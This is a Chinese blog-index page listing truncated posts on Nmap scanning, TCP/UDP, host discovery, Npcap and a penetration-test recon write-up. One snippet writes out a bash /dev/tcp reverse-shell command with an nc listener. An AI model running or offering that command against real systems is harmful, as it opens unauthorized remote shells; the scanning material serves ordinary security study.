端口扫描器:Nmap Nmap是"Network Mapper"的缩写,众所周知,它是一款非常受欢迎的免费开源黑客工具。Nmap被用于发现网络和安全审计。据数据统计,全世界成千上万的系统管理员使用nmap发现网络、检查开放端口、管理服务升级计划,以及监视主机或服务的正常运行时间。Nmap是一种使用原 ...
分类:
其他好文 时间:
2019-04-26 21:03:15
阅读次数:
162
扫描方式 :扫描前不用ping测试目标是否可达,默认所有目标端口都可达 :TCP Connect扫描,进行完整的TCP三次握手,该类型扫描已被检测,且会在目标日志中记录大量连接请求和错误信息 :TCP SYN扫描,只会发送SYN包,简称半开扫描。使用者机器发送SYN请求给目标机器,若对方返回SYN| ...
分类:
其他好文 时间:
2019-04-25 11:47:32
阅读次数:
162
python 反弹shell 我们知道,一般的反弹shell 可以直接使用 base 反弹 bash -i >& /dev/tcp/ownip/port 0>&1 还可以使用一些简单的命令 nc nmap 等等。。。。 nc -l -p port -vv xxx 经过前几次的攻击,他也变聪明了,知道 ...
分类:
编程语言 时间:
2019-04-24 12:07:01
阅读次数:
321
一、d2 安装之后的配置 centos系统安装后的基本配置: 1.常用软件安装: yum install -y bash-completion vim lrzsz wget expect net-tools nc nmap tree dos2unix htop iftop iotop unzip t ...
分类:
系统相关 时间:
2019-04-23 09:20:22
阅读次数:
205
一、说明 在网络原理中我们经常说TCP是面向连接的要进行三次握手和四次挥手所以速度比较慢,UDP是无连接的直接发送和接收所以速度快(说到这个快慢我总想起多年前有篇分析MSN为什么被QQ淘汰的一篇文章其中有一条就是说MSN用的TCP速度慢QQ用的UDP速度快,时至今日我也不确定在聊天软件中用TCP和用 ...
分类:
其他好文 时间:
2019-04-09 20:25:19
阅读次数:
359
一、nmap是什么 nmap是一款网络扫描和主机检测的非常有用的工具,不局限于仅仅收集信息和枚举,同时可以用来作为一个漏洞探测器或安全扫描器。它可以适用于winodws,linux,mac等操作系统。Nmap是一款非常强大的实用工具,可用于: 作用: 检测活在网络上的主机(主机发现) 检测主机上开放 ...
分类:
其他好文 时间:
2019-04-09 12:37:39
阅读次数:
197
信息收集之主动信息收集(一) 主动信息收集: 1.主机发现 1.1二层主机发现 1.2三层主机发现 1.3四层主机发现 2.端口扫描 2.1TCP端口扫描 2.2UDP端口扫描 2.3僵尸扫描 3.服务识别 3.1 python socket 3.2 dmitry -pb 3.3 nmap 3.4 ...
分类:
其他好文 时间:
2019-04-06 14:03:50
阅读次数:
157
Introduction介绍 Introduction介绍 This Manual describes the programming interface and the source code of Npcap. It provides detailed descriptions of the f ...
本人菜鸟,作此记录仅提供思路学习,感谢Ghost老兄帮忙提供思路。 一、信息搜集阶段 1、使用kali 的whatweb对网站大概框架进行收集。得知80端口为asp.net 4、IIS 7.5并且得到IP 2、访问ip返回与域名相同的页面,确定为真实ip,记录下来 3、用nmap对网站开放服务进行扫 ...
分类:
Web程序 时间:
2019-03-29 23:45:11
阅读次数:
270
利用Struts同步令牌(Token)机制来解决Web应用中的重复提交问题。该方法的基本原理是:服务器端在处理到达的request之前,会将request中的Token值与保存在当前用户session中的令牌值进行比较,看是否匹配。在处理完该request后,且在response发送给客户端之前,将 ...
分类:
其他好文 时间:
2019-03-29 11:48:30
阅读次数:
163
